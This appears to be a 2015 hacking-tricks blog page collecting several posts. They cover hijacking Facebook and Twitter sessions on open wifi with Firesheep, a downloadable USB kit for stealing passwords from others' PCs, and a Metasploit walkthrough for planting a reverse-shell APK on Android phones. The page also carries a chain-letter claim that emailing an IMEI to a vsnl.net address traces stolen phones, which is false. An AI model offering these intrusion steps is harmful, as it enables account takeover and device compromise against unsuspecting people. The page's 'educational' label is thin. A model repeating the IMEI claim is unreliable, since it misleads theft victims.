Thursday, 16 July 2015

Hack Facebook and Twitter Password on Wifi

Trick to Hack Facebook and Twitter Password on Wifi




So, the trick I am telling you works only on websites like facebook,twiiter, flickr but not on secured websites like Gmail.So here is Trick to Hack Facebook and Twitter Password on Wifi
and also the method of protection from this hack.This trick doesnot require any programming knowlege and everyone can use this trick easily.

1.Download firesheep Firefox extension.This is a freeware extension for firefox browser.


2.  Once installed it will open a sidebar window into your firefox browser.



3.Now it will show all the people who are connected to unsecured wifi network.Once they login into your facebook or twitter account you will get a notification and with a single click you can login into their account.


This whole thing work on the technique of cookie hijacking.Once your session cookie is hacked then anybody can login into your account.These cookies can be easily caputered on unsecured wifi network.



The best way to protect yourself from such a hacking trick is to avoid using your facebook or twitter accounts on unsecured wifi networks as it is a security lapse from the websites not on your side.

Note:-This article is to inform you about how your password can be hacked and how to prevent it.This article is purely for educational purposes.

Hack a PC by USB

Hack a PC by USB




Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

http://www.mediafire.com/?f3ddzyenlug



Extract it.open pcinfoselect all the files and paste it in ur USB(pendrive) it in the pc u wanna hack...Open the USB drive, give it 2 sec and and ur job is done...


And now open the dump folder in ur pc and u will have all the info u want....
 

Use Your Photo As an ICON

Use Your Photo As an ICON





UseUR photo as ICON:

1.opnMSPAINT

2.opn any image file


3.go to "saveas"filename="anything"

save as type="24bit bitmap (*.bmp,*.bid)

save in: mydocument;

4.now right clk on any folder

5.goto PROPERTIES-CUSTOMIZE-CHANGEICON-BROWSE-MYDOCUMENT- "ANYTHING"then press ok.

How to Recover/Trace/Find Stolen Mobile Free 2015





Learn How to Find, Recover of Trace and stolen mobile phone online  with latest trick of year 2015. Step by step  how to trace a mobile number in Pakistan or any other country. If you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don't need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No. which can be used to track your mobile anywhere in the world. 


This is how it works!!!!!! 

1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit . 
3. Note dow
n this no anywhere but except your mobile as this is the number which will help trace your mobile in case of a theft. 
4. Once stolen you just have to mail this 15 digit IMEI number to tocop@ vsnl.net 
5. No need to go to police. 
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
7. You will find where your handset is being operated even in case your number is being changed. 

PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.


If u lost your mobile, send an e-mail to cop@vsnl.net with the following info

Your name: 
Address: 
Phone model: 
Make: 
Last used No.: 
E-mail for communication:
Missed date:
IMEI Number: 


That's it! Now you can get back your lost mobile phone!

Hack ANDROID Mobiles

How to Hack Android Mobile




Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.


What is android? according to wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.


and what is APK? according to wikipedia:

 Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some initial information for this tutorial:

Attacker IP address: 192.168.8.94

Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use kali Linux/1.0.6 in this tutorial)

2. Android smartphone (we use HTC One android 4.4 KitKat)




Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.

2. We will utilize Metasploit payload framework to create exploit for this tutorial.

 
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command   




3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.  



 Info


4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.



Info: 

Info:


5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution.



6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:



7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone





Conclusion:

1. Don't install APK's from the unknown source.

2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.



Share this post if you found it useful :-)
Share this post if you found it useful :-)

Keep Visiting